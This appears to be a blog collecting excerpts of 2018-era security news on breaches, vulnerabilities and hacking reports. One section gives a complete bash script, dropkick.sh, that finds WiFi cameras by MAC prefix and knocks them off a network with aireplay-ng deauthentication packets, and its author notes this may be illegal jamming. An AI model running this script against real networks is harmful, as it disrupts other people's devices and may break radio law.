Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.

The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.

It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.

Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.

Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.

About 3 billion Yahoo accounts were hit by hackers that included some linked to Russia by the FBI . The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.

Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.

The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.

Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.

The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.

Source: Yahoo to pay $50M, other costs for massive security breach

Printer maker Epson is under fire this month from activist groups after a software update prevented customers from using cheaper, third party ink cartridges. It’s just the latest salvo in a decades-long effort by printer manufacturers to block consumer choice, often by disguising printer downgrades as essential product improvements.

For several decades now printer manufacturers have lured consumers into an arguably-terrible deal: shell out a modest sum for a mediocre printer, then pay an arm and a leg for replacement printer cartridges that cost relatively-little to actually produce.

Unsurprisingly, this resulted in a booming market for discount cartridges and refillable alternatives. Just as unsurprisingly, major printer vendors quickly set about trying to kill this burgeoning market via all manner of lawsuits and dubious behavior.

Initially, companies like Lexmark filed all manner of unsuccessful copyright and patent lawsuits against third-party cartridge makers. When that didn’t work, hardware makers began cooking draconian restrictions into printers, ranging from unnecessary cartridge expiration dates to obnoxious DRM and firmware updates blocking the use of “unofficial” cartridges.

As consumer disgust at this behavior has grown, printer makers have been forced to get more creative in their efforts to block consumer choice.

HP, for example, was widely lambasted back in 2016 when it deployed a “security update” that did little more than block the use of cheaper third-party ink cartridges. HP owners that dutifully installed the update suddenly found their printers wouldn’t work if they’d installed third-party cartridges, forcing them back into the arms of pricier, official HP cartridges.

Massive public backlash forced HP to issue a flimsy mea culpa and reverse course, but the industry doesn’t appear to have learned its lesson quite yet.

The Electronic Frontier Foundation now says that Epson has been engaged in the same behavior. The group says it recently learned that in late 2016 or early 2017, Epson issued a “poison pill” software update that effectively downgraded user printers to block third party cartridges, but disguised the software update as a meaningful improvement.

The EFF has subsequently sent a letter to Texas Attorney General Ken Paxton, arguing that Epson’s lack of transparency can easily be seen as “misleading and deceptive” under Texas consumer protection laws.

“When restricted to Epson’s own cartridges, customers must pay Epson’s higher prices, while losing the added convenience of third party alternatives, such as refillable cartridges and continuous ink supply systems,” the complaint notes. “This artificial restriction of third party ink options also suppresses a competitive ink market and has reportedly caused some manufacturers of refillable cartridges and continuous ink supply systems to exit the market.”

Epson did not immediately return a request for comment.

Activist, author, and EFF member Cory Doctorow tells Motherboard that Epson customers in other states that were burned by the update should contact the organization. That feedback will then be used as the backbone for additional complaints to other state AGs.

“Inkjet printers are the trailblazers of terrible technology business-models, patient zero in an epidemic of insisting that we all arrange our affairs to benefit corporate shareholders, at our own expense,” Doctorow told me via email.

Doctorow notes that not only is this kind of behavior sleazy, it undermines security by eroding consumer faith in the software update process. Especially given that some printers can be easily compromised and used as an attack vector into the rest of the home network.

“By abusing the updating mechanism, Epson is poisoning the security well for all of us: when Epson teaches people not to update their devices, they put us all at risk from botnets,ransomware epidemics, denial of service, cyber-voyeurism and the million horrors of contemporary internet security,” Doctorow said.

“Infosec may be a dumpster-fire, but that doesn’t mean Epson should pour gasoline on it,” he added.

Source: Printer Makers Are Crippling Cheap Ink Cartridges Via Bogus ‘Security Updates’ – Motherboard

There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.

Thanks to Adam Harvey for giving me the push, not to mention for naming it.

For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.

dropkick.sh

See code comments for more info. You’re welcome.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

#!/bin/bash # # DROPKICK.SH # # Detect and Disconnect the DropCam and Withings devices some people are using to # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: # # http://julianoliver.com/output/log_2014-05-30_20-52 # # This script was named by Adam Harvey (http://ahprojects.com), who also # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio # notification. Comment it out if you don't need it. # # See also http://plugunplug.net, for a plug-and-play device that does this # based on OpenWrt. Code here: # # https://github.com/JulianOliver/CyborgUnplug # # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: # # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. readonly NIC=$1 # Your wireless NIC readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not # present. readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings readonly POLL=30 # Check every 30 seconds readonly LOG=/var/log/dropkick.log airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device while true; do for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') do if [[ "$TARGET" == "$GGMAC" ]] then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo "WiFi camera discovered: "$TARGET >> $LOG aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG echo ' __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ ' else echo $TARGET": is not a DropCam or Withings device. Leaving alone.." fi done echo "None found this round." sleep $POLL done airmon-ng stop mon0

Disclaimer

For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.

It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.

All said, use of this script is at your own risk. Use with caution.

Source: Detect and disconnect WiFi cameras in that AirBnB you’re staying in

A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that’s simple to execute and hard to stop –all the features that hackers and malware authors are looking for from an exploitation technique.

What’s more surprising, is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has not received either media coverage nor has it been seen employed in malware campaigns.

Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).

The RID is a code added at the end of account security identifiers (SIDs) that describes that user’s permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.

Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.

The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.

But in cases where a hacker has a foothold on a system –via either malware or by brute-forcing an account with a weak password– the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.

Since registry keys are also boot persistent, any modifications made to an account’s RID remain permanent, or until fixed.

The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.

“It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim,” Castro told ZDNet in an interview last week.

“On the other hand, I think is easy to spot when doing forensics operations, but you need to know where to look at.

“It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager],” Castro added.

Source: Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months | ZDNet

Bug-hunters have told how they uncovered a significant security flaw that affected the likes of Tinder, Yelp, Shopify, and Western Union – and potentially hundreds of millions of folks using these sites and apps.

The software sniffers said they first came across the exploitable programming blunder while digging into webpage code on dating websites. After discovering a Tinder.com subdomain – specifically, go.tinder.com – that had a cross-site scripting flaw, they got in touch with the hookup app’s makers to file a bug report.

As it turned out, the vulnerability they discovered went far beyond one subdomain on a site for lonely hearts. The team at VPNMentor said the since-patched security hole had left as many as 685 million netizens vulnerable to cross-site-scripting attacks, during which hackers attempt to steal data and hijack accounts. To pull off one of these scripting attacks, a victim would have to click on a malicious link or open a booby-trapped webpage while logged into a vulnerable service.

That staggering nine-figure number is because the security issue was actually within a toolkit, called branch.io, that tracks website and app users to figure out where they’ve come from, be it Facebook, email links, Twitter, etc. With the bug lurking in branch.io’s code and embedded in a ton of services and mobile applications, the number of people potentially at risk of being hacked via cross-site scripting soared past the half-a-billion mark, we’re told.

Source: Now this might be going out on a limb, but here’s how a branch.io bug left ‘685 million’ netizens open to website hacks • The Register

3 GOP senators want Google to give answers over data leak that affected 500,000 users.

Source: Senators to Google: Why didn’t you disclose Google+ vulnerability sooner?

It’s only three senators and chances are you haven’t heard of the massive, millions affected data breach suffered by Google, that they didn’t report. Interestingly, if you try to Google the breach you get loads of hits on Google’s bug reporting program, but almost nothing on the breach. Google has done an astoundly good job of keeping this under their hats.

The vuln (CVE-2018-6977) allows an attacker with normal local user privileges to trigger an infinite loop in a 3D-rendering shader. According to VMware, a “specially crafted 3D shader may loop for an infinite amount of time and lock up a VM’s virtual graphics device”.

If that happens, VMware warned, the hypervisor may rely on the host box’s graphics driver to ensure other users of the physical machine are not impacted by the infinite graphical loop.

“However, many graphics drivers may themselves get into to a denial-of-service condition caused by such infinite shaders, and as a result other VMs or processes running on the host might also be affected,” said VMware in a statement.

Source: Slow your roll: VMware urges admins to apply workarounds to DoS-inducing 3D render vuln • The Register

FitMetrix, a fitness technology and performance tracking company owned by gym booking giant Mindbody, has exposed millions of user records because it left several of its servers without a password.

The company builds fitness tracking software for gyms and group classes — like CrossFit and SoulCycle — that displays heart rate and other fitness metric information for interactive workouts. FitMetrix was acquired by gym and wellness scheduling service Mindbody earlier this year for $15.3 million, according to a government filing.

Last week, a security researcher found three FitMetrix unprotected servers leaking customer data.

It isn’t known how long the servers had been exposed, but the servers were indexed by Shodan, a search engine for open ports and databases, in September.

The servers included two of the same ElasticSearch instances and a storage server — all hosted on Amazon Web Service — yet none were protected by a password, allowing anyone who knew where to look to access the data on millions of users.

Bob Diachenko, Hacken.io’s director of cyber risk research, found the databases containing 113.5 million records — though it’s not known how many users were directly affected. Each record contained a user’s name, gender, email address, phone numbers, profile photos, their primary workout location, emergency contacts and more. Many of the records were not fully complete.

Source: MindBody-owned FitMetrix exposed millions of user records — thanks to servers without passwords | TechCrunch

New computerized weapons systems currently under development by the US Department of Defense (DOD) can be easily hacked, according to a new report published today.

The report was put together by the US Government Accountability Office (GAO), an agency that provides auditing, evaluation, and investigative services for Congress.

Congress ordered the GAO report in preparation to approve DOD funding of over $1.66 trillion, so the Pentagon could expand its weapons portfolio with new toys in the coming years.

But according to the new report, GAO testers “playing the role of adversary” found a slew of vulnerabilities of all sort of types affecting these new weapons systems.

“Using relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected, due in part to basic issues such as poor password management and unencrypted communications,” GAO officials said.

The report detailed some of the most eye-catching hacks GAO testers performed during their analysis.

In one case, it took a two-person test team just one hour to gain initial access to a weapon system and one day to gain full control of the system they were testing.

Some programs fared better than others. For example, one assessment found that the weapon system satisfactorily prevented unauthorized access by remote users, but not insiders and near-siders. Once they gained initial access, test teams were often able to move throughout a system, escalating their privileges until they had taken full or partial control of a system.

In one case, the test team took control of the operators’ terminals. They could see, in real-time, what the operators were seeing on their screens and could manipulate the system. They were able to disrupt the system and observe how the operators responded.

Another test team reported that they caused a pop-up message to appear on users’ terminals instructing them to insert two quarters to continue operating.

Multiple test teams reported that they were able to copy, change, or delete system data including one team that downloaded 100 gigabytes, approximately 142 compact discs, of data.

One test report indicated that the test t eam was able to guess an administrator password in nine seconds.

For example, in some cases, simply scanning a system caused parts of the system to shut down. One test had to be stopped due to safety concerns after the test team scanned the system.

Nearly all major acquisition programs that were operationally tested between 2012 and 2017 had mission-critical cyber vulnerabilities that adversaries could compromise.

Source: Pentagon’s new next-gen weapons systems are laughably easy to hack | ZDNet

Who would have thought it – after they decided to use  Windows (95) for Warships

Yet another IoT device vendor has been found to be exposing their products to attackers with basic security lapses.

This time, it’s Chinese surveillance camera maker Xiongmai who was named and shamed by researchers with SEC Consult for the poor security in the XMEye P2P Cloud service. Among the problems researchers pointed to were exposed default credentials and unsigned firmware updates that could be delivered via the service.

As a result, SEC Consult warns, the cameras could be compromised to do everything from spy on their owners, to carry out botnet instructions and even to serve as an entry point for larger network intrusions.

“Our recommendation is to stop using Xiongmai and Xiongmai OEM devices altogether,” SEC Consult recommended.

“The company has a bad security track record including its role in Mirai and various other IoT botnets. There are vulnerabilities that have been published in 2017, which are still not fixed in the most recent firmware version.”

Enabled by default, the P2P Cloud service allows users to remotely connect to devices via either a web browser or an iOS/Android app and control the hardware without needing a local network connection.

Source: World’s largest CCTV maker leaves at least 9 million cameras open to public viewing • The Register

A vulnerability in the Google+ social network exposed the personal data of up to 500,000 people using the site between 2015 and March 2018, the search giant said Monday.

Google said it found no evidence of data misuse. Still, as part of the response to the incident, Google plans to shut down the social network permanently.

The company didn’t disclose the vulnerability when it fixed it in March because the company didn’t want to invite regulatory scrutiny from lawmakers, according to a report Monday by The Wall Street Journal. Google CEO Sundar Pichai was briefed on the decision to not disclose the finding, after an internal committee had already decided the plan, the Journal said.

Google said it found the bug as part of an internal review called Project Strobe, an audit started earlier this year that examines access to user data from Google accounts by third-party software developers. The bug gave apps access to information on a person’s Google+ profile that can be marked as private. That includes details like email addresses, gender, age, images, relationship statuses, places lived and occupations. Up to 438 applications on Google Plus had access to this API, though Google said it has no evidence any developers were aware of the vulnerability.

Source: Google shutting down Google+ after exposing data of up to 500,000 users – CNET

The real story here is that they didn’t disclose.

In less than two years, anything that can connect to the internet will come with a unique password — that is, if it’s produced or sold in California. The “Information Privacy: Connected Devices” bill that comes into effect on January 1, 2020, effectively bans pre-installed and hard-coded default passwords. It only took the authorities about two weeks to approve the proposal made by the state senate.

The new regulation mandates device manufacturers to either create a unique password for each device at the time of production or require the user to create one when they interact with the device for the first time. According to the bill, it applies to any connected device, which is defined as a “physical object that is capable of connecting to the Internet, directly or indirectly, and that is assigned an Internet Protocol address or Bluetooth address.”

The law is clearly aimed at stopping the spread of botnets made up of compromised network devices, such as routers, smart switches or even security cameras and other IoT equipment. Malicious software could often take control of them by trying easy-to-guess or publicly disclosed default login credentials. It’s not entirely clear yet as to how the new regulation will affect legacy industry hardware from the 1980s and 1990s where passwords are either hard-coded or next to impossible to change.

Source: California bans default passwords on any internet-connected device

A simple and very effective start to legislation on IoT

In its ongoing exploration of Intel’s Management Engine (ME), security biz Positive Technologies has reaffirmed the shortsightedness of security through obscurity and underscored the value of open source silicon.

The Intel ME, included on most Intel chipsets since 2008, is controversial because it expands the attack surface of Intel-based hardware. If compromised, it becomes side-channel threat to the main processor.

The Electronic Frontier Foundation last year called it a security hazard and asked for a way to disable it, a request that researchers from Positive Technologies subsequently met.

In a blog post on Tuesday, researchers Maxim Goryachy and Mark Ermolov, involved in the discovery of an Intel ME firmware flaw last year, reveal that Chipzilla’s ME contains an undocumented Manufacturing Mode, among its other little known features like High Assurance Platform mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” explain Goryachy and Ermolov. “However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

Manufacturing Mode can only be accessed using a utility included in Intel ME System Tools software, which isn’t available to the public. It’s intended to configure important platform settings in one-time programmable memory called Field Programming Fuses (FPF) prior to product shipment and in ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

In chipsets prior to Apollo Lake, Goryachy and Ermolov observe, Intel kept access rights for its Management Engine, Gigabit Ethernet, and CPU separate. The SPI controllers in more recent chips, however, have a capability called a Master Grant which overrides the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

And because it turns out that device makers may not disable Manufacturing Mode, there’s an opportunity for an attacker – with local access – to alter the Intel ME to allow the writing of arbitrary data.

At least one Intel customer failed to turn Manufacturing Mode off: Apple. The researchers analyzed notebooks from several computer makers and found that Apple had left Manufacturing Mode open. They reported the vulnerability (CVE-2018-4251) and Apple patched it in June via its macOS High Sierra 10.13.5 update.

Source: Apple forgot to lock Intel Management Engine in laptops, so get patching • The Register

Party chairman Brandon Lewis was planning to sell the “interactive” app – which will allow attendees to give feedback on speeches as they happen – as evidence that the ruling party was embracing tech in a bid to win over the youth vote (another idea was to have the culture secretary appear as a hologram).

But soon after its launch, users took to Twitter to point out that that not only were contact details and personal information visible – they could also be edited.

Particular targets appeared to be Michael Gove, whose picture was changed to that of his former boss Rupert Murdoch, and Boris Johnson, whose name and profile picture were reportedly changed during the incident.

Crowd Comms, the company behind the app, said the error “meant that a third party in possession of a conference attendee’s email address was able, without further authentication, to potentially see data which the attendee had not wished to share – name, email address, phone number, job title and photo”.

Since email addresses are often pretty easy to guess, or – in the case of MPs or other professionals registered on the app – a case of public record, the cock-up had a wide potential impact.

Source: UK ruling party’s conference app editable by world+dog, blabs members’ digits • The Register

Hackers probing America’s electronic voting systems have painted an astonishing picture of the state of US election security, less than six weeks before the November midterms.

The full 50-page report [PDF], released Thursday during a presentation in Washington DC, was put together by the organizers of the DEF CON hacking conference’s Voting Village. It recaps the findings of that village, during which attendees uncovered ways resourceful miscreants could compromise electoral computer systems and change vote tallies.

In short, the dossier outlines shortcomings in the electronic voting systems many US districts will use later this year for the midterm elections. The report focuses on vulnerabilities exploitable by scumbags with physical access to the hardware.

“The problems outlined in this report are not simply election administration flaws that need to be fixed for efficiency’s sake, but rather serious risks to our critical infrastructure and thus national security,” the report stated. “As our nation’s security is the responsibility of the federal government, Congress needs to codify basic security standards like those developed by local election officials.”

Criminally easy to hack

Researchers found that many of the systems tested were riddled with basic security blunders committed by their manufacturers, such as using default passwords and neglecting to install locks or tamper-proof seals on casings. These could be exploited by miscreants to do anything from add additional votes to create and stuff the ballot with entirely new candidates. It would require the crooks to get their hands on the machines long enough to meddle with the hardware.

Some electronic ballot boxes use smart cards loaded with Java-written software, which executes once inserted into the computer. Each citizen is given a card, which they slide in the machine when they go to vote. Unfortunately, it is possible to reprogram your card yourself so that when inserted, you can vote multiple times. If the card reader has wireless NFC support, you can hold your NFC smartphone up to the voting machine, and potentially cast a ballot many times over.

“Due to a lack of security mechanisms in the smart card implementation, researchers in the Voting Village demonstrated that it is possible to create a voter activation card, which after activating the election machine to cast a ballot can automatically reset itself and allow a malicious voter to cast a second (or more) unauthorized ballots,” the report read.

“Alternatively, an attacker can use his or her mobile phone to reprogram the smart card wirelessly.”

Source: DEF CON hackers’ dossier on US voting machine security is just as grim as feared

A vulnerability in Cisco Video Surveillance Manager (VSM) Software running on certain Cisco Connected Safety and Security Unified Computing System (UCS) platforms could allow an unauthenticated, remote attacker to log in to an affected system by using the root account, which has default, static user credentials.

The vulnerability is due to the presence of undocumented, default, static user credentials for the root account of the affected software on certain systems. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

Source: Cisco Video Surveillance Manager Appliance Default Password Vulnerability

Incredible that this is still a thing, especially at Cisco, where it’s happened before.

If you’re one of the people who own a stylus or touchscreen-capable Windows PC, then there’s a high chance there’s a file on your computer that has slowly collected sensitive data for the past months or even years.

This file is named WaitList.dat, and according to Digital Forensics and Incident Response (DFIR) expert Barnaby Skeggs, this file is only found on touchscreen-capable Windows PCs where the user has enabled the handwriting recognition feature [1, 2] that automatically translates stylus/touchscreen scribbles into formatted text.

Source: This Windows file may be secretly hoarding your passwords and emails | ZDNet

More than 7,500 Mikrotik routers have been compromised with malware that logs and transmits network traffic data to an unknown control server.

This is according to researchers from 360 Netlab, who found the routers had all been taken over via an exploit for CVE-2018-14847, a vulnerability first disclosed in the Vault7 data dump of supposed CIA hacking tools.

Since mid-July, Netlab said, attackers have looked to exploit the flaw and enlist routers to do things like force connected machines to mine cryptocurrency, and, in this case, forward their details on traffic packets to a remote server.

“At present, a total of 7,500 MikroTik RouterOS device IPs have been compromised by the attacker and their TZSP traffic is being forwarded to some collecting IP addresses,” the researchers explained.

The infection does not appear to be targeting any specific region, as the hacked devices reside across five different continents with Russia, Brazil, and Indonesia being the most commonly impacted.

The researchers noted that the malware is also resilient to reboots.

Source: Mikrotik routers pwned en masse, send network data to mysterious box • The Register

mSpy, a commercial spyware solution designed to help you spy on kids and partners, has leaked over 2 million records including software purchases and iCloud usernames and authentication tokens of devices running mSky. The data appears to have come from an unsecured database that allowed security researchers to pull out millions of records.

“Before it was taken offline sometime in the past 12 hours, the database contained millions of records, including the username, password and private encryption key of each mSpy customer who logged in to the mSpy site or purchased an mSpy license over the past six months,” wrote security researcher Brian Krebs.

Source: Mobile spyware maker leaks 2 million records | TechCrunch

BMCs can be used to remotely monitor system temperature, voltage and power consumption, operating system health, and so on, and power cycle the box if it runs into trouble, tweak configurations, and even, depending on the setup, reinstall the OS – all from the comfort of an operations center, as opposed to having to find an errant server in the middle of a data center to physically wrangle. They also provide the foundations for IPMI.

[…]

It’s a situation not unlike Intel’s Active Management Technology, a remote management component that sits under the OS or hypervisor, has total control over a system, and been exploited more than once over the years.

Waisman and his colleague Matias Soler, a senior security researcher at Immunity, examined these BMC systems, and claimed the results weren’t good. They even tried some old-school hacking techniques from the 1990s against the equipment they could get hold of, and found them to be very successful. With HP’s BMC-based remote management technology iLO4, for example, the builtin web server could be tricked into thinking a remote attacker was local, and so didn’t need to authenticate them.

“We decided to take a look at these devices and what we found was even worse than what we could have imagined,” the pair said. “Vulnerabilities that bring back memories from the 1990s, remote code execution that is 100 per cent reliable, and the possibility of moving bidirectionally between the server and the BMC, making not only an amazing lateral movement angle, but the perfect backdoor too.”

The fear is that once an intruder gets into a data center network, insecure BMC firmware could be used to turn a drama into a crisis: vulnerabilities in the technology could be exploited to hijack more systems, install malware that persists across reboots and reinstalls, or simple hide from administrators.

[…]

The duo probed whatever kit they could get hold of – mainly older equipment – and it could be that modern stuff is a lot better in terms of security with firmware that follows secure coding best practices. On the other hand, what Waisman and Soler have found and documented doesn’t inspire a terrible amount of confidence in newer gear.

Their full findings can be found here, and their slides here.

Source: Can we talk about the little backdoors in data center servers, please? • The Register

Security researchers have found more than 20 bugs in the world’s most popular open source software for managing medical records. Many of the vulnerabilities were classified as severe, leaving the personal information of an estimated 90 million patients exposed to bad actors.

OpenEMR is open source software that’s used by medical offices around the world to store records, handle schedules, and bill patients. According to researchers at Project Insecurity, it was also a bit of a security nightmare before a recent audit recommended a range of vital fixes.

The firm reached out to OpenEMR in July to discuss concerns it had about the software’s code. On Tuesday a report was released detailing the issues that included: “a portal authentication bypass, multiple instances of SQL injection, multiple instances of remote code execution, unauthenticated information disclosure, unrestricted file upload, CSRFs including a CSRF to RCE proof of concept, and unauthenticated administrative actions.”

Eighteen of the bugs were designated as having a “high” severity and could’ve been exploited by hackers with low-level access to systems running the software. Patches have been released to users and cloud customers.

OpenEMR’s project administrator Brady Miller told the BBC, “The OpenEMR community takes security seriously and considered this vulnerability report high priority since one of the reported vulnerabilities did not require authentication.”

Source: Critical OpenEMR Flaws Left Medical Records Vulnerable

The US Department of Homeland Security is once again accusing Russian government hackers of penetrating America’s critical infrastructure.

Uncle Sam’s finest reckon Moscow’s agents managed to infiltrate computers networks within US electric utilities – to the point where the miscreants could have virtually pressed the off switch in control rooms, yanked the plug on the Yanks, and plunged America into darkness.

The hackers, dubbed Dragonfly and Energetic Bear, struck in the spring of 2016, and continued throughout 2017 and into 2018, even invading air-gapped networks, it is claimed.

This seemingly Hollywood screenplay emerged on Monday in the pages of the Wall Street Journal (paywalled) which spoke to Homeland Security officials on the record.

The Energetic Bear aka Dragonfly crew – fingered in 2014 by Crowdstrike and Symantec – was inside “hundreds” of power grid control rooms by last year, it is claimed. Indeed, since 2014, power companies have been warned by Homeland Security to be on the look out for state-backed snoops – with technical details on intrusions published here.

The Russians hacked into the utilities’ equipment vendors and suppliers by spear-phishing staff for their login credentials or installing malware on their machines via boobytrapped webpages, it is alleged.

The miscreants then leveraged their position within these vendors to infiltrate the utilities and squeeze into the isolated air-gapped networks in control rooms, it is further alleged. The hacker crew also swiped confidential internal information and blueprints to learn how American power plants and the grid system work.

We’re told, and can well believe, that the equipment makers and suppliers have special access into the utilities’ networks in order to provide remote around-the-clock support and patch deployment – access that, it seems, turned into a handy conduit for Kremlin spies.

The attacks are believed to be ongoing, and some utilities may not yet be aware they’ve been pwned, we were warned. It is feared the stolen information, as well as these early intrusions, could be part of a much larger looming assault.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.

Source: No big deal… Kremlin hackers ‘jumped air-gapped networks’ to pwn US power utilities • The Register

Hackers used phishing emails to break into a Virginia bank in two separate cyber intrusions over an eight-month period, making off with more than $2.4 million total. Now the financial institution is suing its insurance provider for refusing to fully cover the losses.

According to a lawsuit filed last month in the Western District of Virginia, the first heist took place in late May 2016, after an employee at The National Bank of Blacksburg fell victim to a targeted phishing email.

The email allowed the intruders to install malware on the victim’s PC and to compromise a second computer at the bank that had access to the STAR Network, a system run by financial industry giant First Data that the bank uses to handle debit card transactions for customers. That second computer had the ability to manage National Bank customer accounts and their use of ATMs and bank cards.

Armed with this access, the bank says, hackers were able to disable and alter anti-theft and anti-fraud protections, such as 4-digit personal identification numbers (PINs), daily withdrawal limits, daily debit card usage limits, and fraud score protections.

National Bank said the first breach began Saturday, May 28, 2016 and continued through the following Monday. Normally, the bank would be open on a Monday, but that particular Monday was Memorial Day, a federal holiday in the United States. The hackers used hundreds of ATMs across North America to dispense funds from customer accounts. All told, the perpetrators stole more than $569,000 in that incident.

[…]

But just eight months later — in January 2017 according to the lawsuit — hackers broke in to the bank’s systems once more, again gaining access to the financial institution’s systems via a phishing email.

[…]

Prior to executing the second heist, the hackers used the bank’s Navigator system to fraudulently credit more than $2 million to various National Bank accounts. As with the first incident, the intruders executed their heist on a weekend. Between Jan. 7 and 9, 2017, the hackers modified or removed critical security controls and withdrew the fraudulent credits using hundreds of ATMs.

All the while, the intruders used the bank’s systems to actively monitor customer accounts from which the funds were being withdrawn. At the conclusion of the 2017 heist, the hackers used their access to delete evidence of fraudulent debits from customer accounts. The bank’s total reported loss from that breach was $1,833,984.

Source: Hackers Breached Virginia Bank Twice in Eight Months, Stole $2.4M — Krebs on Security

A cryptographic bug in many Bluetooth firmware and operating system drivers could allow an attacker within about 30 meters to capture and decrypt data shared between Bluetooth-paired devices.

The flaw was found by Lior Neumann and Eli Biham of the Israel Institute of Technology, and flagged today by Carnegie Mellon University CERT. The flaw, which is tracked as CVE-2018-5383, has been confirmed to affect Apple, Broadcom, Intel, and Qualcomm hardware, and some Android handsets. It affects Bluetooth’s Secure Simple Pairing and Low Energy Secure Connections. Fortunately for macOS users, Apple released a patch for the flaw in July.

As the CERT notification explains, the vulnerability is caused by some vendors’ Bluetooth implementations not properly validating the cryptographic key exchange when Bluetooth devices are pairing. The flaw slipped into the Bluetooth key exchange implementation which uses the elliptic-curve Diffie-Hellman (ECDH) key exchange to establish a secure connection over an insecure channel.

This may allow a nearby but remote attacker to inject a a bogus public key to determine the session key during the public-private key exchange. They could then conduct a man-in-the-middle attack and “passively intercept and decrypt all device messages, and/or forge and inject malicious messages”.

Source: Bluetooth security: Flaw could allow nearby attacker to grab your private data | ZDNet